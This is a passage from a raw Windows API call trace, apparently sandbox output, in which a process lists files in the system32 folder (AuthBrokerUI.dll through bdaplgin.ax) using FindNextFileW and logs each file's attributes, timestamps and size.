ftCreationTime.dwLowDateTime=0x6d03bee0, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6d03bee0, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6d03bee0, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthBrokerUI.dll", cAlternateFileName="")) returned 1 [0102.827] lstrlenW (lpString="AuthBrokerUI.dll") returned 16 [0102.827] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72d0e8 [0102.827] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x754dd9c7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x754dd9c7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x754dd9c7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthExt.dll", cAlternateFileName="")) returned 1 [0102.827] lstrlenW (lpString="AuthExt.dll") returned 11 [0102.827] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x731260 [0102.828] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x721277da, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x721277da, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7214da41, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x56200, dwReserved0=0x0, dwReserved1=0x0, cFileName="authfwcfg.dll", cAlternateFileName="")) returned 1 [0102.828] lstrlenW (lpString="authfwcfg.dll") returned 13 [0102.828] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9c) returned 0x732638 [0102.828] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ed715f1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6ed715f1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6ed715f1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x49800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWGP.dll", cAlternateFileName="")) returned 1 [0102.828] lstrlenW (lpString="AuthFWGP.dll") returned 12 [0102.828] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x731a68 [0102.828] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ed715f1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6ed715f1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6ed715f1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4dd400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWSnapin.dll", cAlternateFileName="")) returned 1 [0102.828] lstrlenW (lpString="AuthFWSnapin.dll") returned 16 [0102.828] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72d508 [0102.828] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ed715f1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6ed715f1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6ed715f1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWWizFwk.dll", cAlternateFileName="")) returned 1 [0102.829] lstrlenW (lpString="AuthFWWizFwk.dll") returned 16 [0102.829] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa2) returned 0x72dea8 [0102.829] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762dfbaf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x762dfbaf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x762dfbaf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6a600, dwReserved0=0x0, dwReserved1=0x0, cFileName="authui.dll", cAlternateFileName="")) returned 1 [0102.829] lstrlenW (lpString="authui.dll") returned 10 [0102.829] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x731120 [0102.829] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71f5daff, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x71f5daff, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x71f5daff, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="authz.dll", cAlternateFileName="")) returned 1 [0102.829] lstrlenW (lpString="authz.dll") returned 9 [0102.829] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x94) returned 0x731800 [0102.829] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f1d7f05, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x6f1d7f05, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x6f1d7f05, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0xda000, dwReserved0=0x0, dwReserved1=0x0, cFileName="autochk.exe", cAlternateFileName="")) returned 1 [0102.830] lstrlenW (lpString="autochk.exe") returned 11 [0102.830] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x7311c0 [0102.830] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75bf0aaa, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x75bf0aaa, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x75bf0aaa, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0xd6200, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoconv.exe", cAlternateFileName="")) returned 1 [0102.830] lstrlenW (lpString="autoconv.exe") returned 12 [0102.830] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x7326e0 [0102.830] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75bf0aaa, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x75bf0aaa, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x75bf0aaa, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0xd0600, dwReserved0=0x0, dwReserved1=0x0, cFileName="autofmt.exe", cAlternateFileName="")) returned 1 [0102.830] lstrlenW (lpString="autofmt.exe") returned 11 [0102.830] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x7318a0 [0102.830] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x761ae871, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x761ae871, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x761ae871, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoplay.dll", cAlternateFileName="")) returned 1 [0102.830] lstrlenW (lpString="autoplay.dll") returned 12 [0102.831] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x731db0 [0102.831] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ed715f1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6ed715f1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6ed715f1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x10e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="avicap32.dll", cAlternateFileName="")) returned 1 [0102.831] lstrlenW (lpString="avicap32.dll") returned 12 [0102.831] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x732788 [0102.831] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ed4b389, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6ed4b389, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6ed4b389, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="avifil32.dll", cAlternateFileName="")) returned 1 [0102.831] lstrlenW (lpString="avifil32.dll") returned 12 [0102.831] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x7328d8 [0102.832] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b352cb1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b352cb1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b352cb1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7140, dwReserved0=0x0, dwReserved1=0x0, cFileName="avrt.dll", cAlternateFileName="")) returned 1 [0102.832] lstrlenW (lpString="avrt.dll") returned 8 [0102.832] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x92) returned 0x730fe0 [0102.832] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a3146b8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6a3146b8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6a3146b8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa273, dwReserved0=0x0, dwReserved1=0x0, cFileName="azman.msc", cAlternateFileName="")) returned 1 [0102.832] lstrlenW (lpString="azman.msc") returned 9 [0102.832] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cf30e11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6cf30e11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6cf30e11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xbde00, dwReserved0=0x0, dwReserved1=0x0, cFileName="azroles.dll", cAlternateFileName="")) returned 1 [0102.832] lstrlenW (lpString="azroles.dll") returned 11 [0102.832] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x730e00 [0102.832] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a2ee44d, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6a2ee44d, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6a3146b8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x50a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="azroleui.dll", cAlternateFileName="")) returned 1 [0102.832] lstrlenW (lpString="azroleui.dll") returned 12 [0102.833] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x732980 [0102.833] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cf30e11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6cf30e11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6cf30e11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzSqlExt.dll", cAlternateFileName="")) returned 1 [0102.833] lstrlenW (lpString="AzSqlExt.dll") returned 12 [0102.833] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x731bb8 [0102.833] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79af8e28, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x79af8e28, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x79af8e28, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x130e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzureSettingSyncProvider.dll", cAlternateFileName="")) returned 1 [0102.833] lstrlenW (lpString="AzureSettingSyncProvider.dll") returned 28 [0102.833] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xba) returned 0x730670 [0102.833] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b3c53e2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b3c53e2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b3c53e2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BackgroundMediaPolicy.dll", cAlternateFileName="")) returned 1 [0102.833] lstrlenW (lpString="BackgroundMediaPolicy.dll") returned 25 [0102.833] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb4) returned 0x730738 [0102.834] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74406a3a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x74406a3a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x74406a3a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x45a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="backgroundTaskHost.exe", cAlternateFileName="")) returned 1 [0102.834] lstrlenW (lpString="backgroundTaskHost.exe") returned 22 [0102.834] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xae) returned 0x7307f8 [0102.834] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72258b18, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x72258b18, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x72258b18, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8800, dwReserved0=0x0, dwReserved1=0x0, cFileName="BackgroundTransferHost.exe", cAlternateFileName="")) returned 1 [0102.834] lstrlenW (lpString="BackgroundTransferHost.exe") returned 26 [0102.834] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xb6) returned 0x732a48 [0102.834] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c154e8c, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x70b27991, ftLastAccessTime.dwHighDateTime=0x1d2fa08, ftLastWriteTime.dwLowDateTime=0x6c154e8c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BamSettingsClient.dll", cAlternateFileName="")) returned 1 [0102.834] lstrlenW (lpString="BamSettingsClient.dll") returned 21 [0102.834] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xac) returned 0x732b08 [0102.834] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75d6e214, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x75d6e214, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x75d6e214, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x2af98, dwReserved0=0x0, dwReserved1=0x0, cFileName="basecsp.dll", cAlternateFileName="")) returned 1 [0102.834] lstrlenW (lpString="basecsp.dll") returned 11 [0102.835] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x98) returned 0x731080 [0102.835] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75503c2e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x75503c2e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x75503c2e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x195600, dwReserved0=0x0, dwReserved1=0x0, cFileName="batmeter.dll", cAlternateFileName="")) returned 1 [0102.835] lstrlenW (lpString="batmeter.dll") returned 12 [0102.835] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x731c60 [0102.835] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4afd74a3, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x5b21682b, ftLastAccessTime.dwHighDateTime=0x1d2fa0b, ftLastWriteTime.dwLowDateTime=0x4afd74a3, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0xb3400, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcastdvr.exe", cAlternateFileName="")) returned 1 [0102.835] lstrlenW (lpString="bcastdvr.exe") returned 12 [0102.835] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9a) returned 0x731d08 [0102.835] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b3067de, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b3067de, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b3067de, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1ba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcastdvr.proxy.dll", cAlternateFileName="")) returned 1 [0102.835] lstrlenW (lpString="bcastdvr.proxy.dll") returned 18 [0102.836] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa6) returned 0x72d718 [0102.836] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b3067de, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b3067de, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b3067de, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x47c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BcastDVRBroker.dll", cAlternateFileName="")) returned 1 [0102.836] lstrlenW (lpString="BcastDVRBroker.dll") returned 18 [0102.836] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa6) returned 0x72cf88 [0102.836] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b3067de, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b3067de, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b32ca45, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3ac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BcastDVRClient.dll", cAlternateFileName="")) returned 1 [0102.836] lstrlenW (lpString="BcastDVRClient.dll") returned 18 [0102.836] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa6) returned 0x72df58 [0102.836] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b3067de, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6b3067de, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6b3067de, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x19a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BcastDVRCommon.dll", cAlternateFileName="")) returned 1 [0102.836] lstrlenW (lpString="BcastDVRCommon.dll") returned 18 [0102.836] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa6) returned 0x72d7c8 [0102.837] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799d7541, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x799d7541, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x799d7541, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x18788, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcd.dll", cAlternateFileName="")) returned 1 [0102.837] lstrlenW (lpString="bcd.dll") returned 7 [0102.837] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x90) returned 0x732bc0 [0102.837] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc7e8a3, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc7e8a3, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc7e8a3, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4e140, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCP47Langs.dll", cAlternateFileName="")) returned 1 [0102.837] lstrlenW (lpString="BCP47Langs.dll") returned 14 [0102.837] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x9e) returned 0x731e58 [0102.837] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd17248, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fd17248, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fd17248, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x16d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcrypt.dll", cAlternateFileName="")) returned 1 [0102.837] lstrlenW (lpString="bcrypt.dll") returned 10 [0102.838] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x96) returned 0x7316c0 [0102.838] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41a40ef8, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0x683e5e1d, ftLastAccessTime.dwHighDateTime=0x1d2fa0b, ftLastWriteTime.dwLowDateTime=0x41a40ef8, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x56838, dwReserved0=0x0, dwReserved1=0x0, cFileName="bcryptprimitives.dll", cAlternateFileName="")) returned 1 [0102.838] lstrlenW (lpString="bcryptprimitives.dll") returned 20 [0102.838] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xaa) returned 0x732c58 [0102.838] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e1390d8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6e1390d8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6e1390d8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x12c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="bdaplgin.ax", cAlternateFileName="")) returned 1 [0102.838] lstrlenW (lpString="bdaplgin.ax") returned 11 [0102.838] FindNextFileW (in: hFindFile=0x70a298, lpFindFileData=0x72b6b8 | out: lpFindFileData=0x72b6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20c0ce20, ftCreationTime.dwHighDateTime=0x1d32773, ftLastAccessTime.dwLowDateTime=0x5497abae, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x5497abae, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BestPractices", cAlternateFileName="BESTPR~1")) returned 1 [0102.838] lstrlenW (lpString="BestPractices") returned 13 [0102.838] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x250) returned 0x732d10 [0102.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\WINDOWS\\system32\\BestPractices\\*", lpFindFileData=0x732d10 | out: 